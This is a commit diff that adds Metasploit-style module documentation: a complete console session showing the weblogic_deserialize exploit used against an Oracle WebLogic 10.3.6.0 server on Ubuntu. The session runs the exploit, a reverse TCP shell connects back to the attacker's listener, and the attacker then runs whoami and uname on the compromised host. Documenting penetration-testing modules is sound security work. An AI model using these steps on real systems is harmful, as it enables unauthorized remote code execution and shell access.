Add linux target to weblogic_deserialize module
This commit is contained in:
@@ -45,3 +45,39 @@ Logged On Users : 2
|
||||
Meterpreter : x86/windows
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Tested on Ubuntu 14.04 LTS x64 running Oracle Weblogic Server 10.3.6.0 on Sun SDK 1.6.0_29
|
||||
```
|
||||
msf5 > use exploit/windows/misc/weblogic_deserialize
|
||||
msf5 exploit(windows/misc/weblogic_deserialize) > set rhosts 172.22.222.205
|
||||
rhosts => 172.22.222.205
|
||||
msf5 exploit(windows/misc/weblogic_deserialize) > set lhost 172.22.222.197
|
||||
lhost => 172.22.222.197
|
||||
msf5 exploit(windows/misc/weblogic_deserialize) > set srvhost 172.22.222.197
|
||||
srvhost => 172.22.222.197
|
||||
msf5 exploit(windows/misc/weblogic_deserialize) > set verbose true
|
||||
verbose => true
|
||||
msf5 exploit(windows/misc/weblogic_deserialize) > check
|
||||
|
||||
[+] 172.22.222.205:7001 - Detected Oracle WebLogic Server Version: 10.3.6.0
|
||||
[*] 172.22.222.205:7001 The target appears to be vulnerable.
|
||||
msf5 exploit(windows/misc/weblogic_deserialize) > run
|
||||
[*] Exploit running as background job 2.
|
||||
msf5 exploit(windows/misc/weblogic_deserialize) >
|
||||
[*] Started reverse TCP handler on 172.22.222.197:4444
|
||||
[*] 172.22.222.205:7001 - Sending handshake...
|
||||
[*] 172.22.222.205:7001 - Sending client object payload...
|
||||
[*] 172.22.222.205:7001 - Comparing host: 172.22.222.205
|
||||
[*] 172.22.222.205:7001 - Sending payload to client: 172.22.222.205
|
||||
[*] 172.22.222.205:7001 - Comparing host: 172.22.222.205
|
||||
[*] Command shell session 1 opened (172.22.222.197:4444 -> 172.22.222.205:35904) at 2018-08-28 10:59:20 -0500
|
||||
[*] 172.22.222.205:7001 - Server stopped.
|
||||
msf5 exploit(windows/misc/weblogic_deserialize) >
|
||||
sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
whoami
|
||||
msfdev
|
||||
uname -a
|
||||
Linux ubuntu 4.4.0-134-generic #160~14.04.1-Ubuntu SMP Fri Aug 17 11:07:07 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user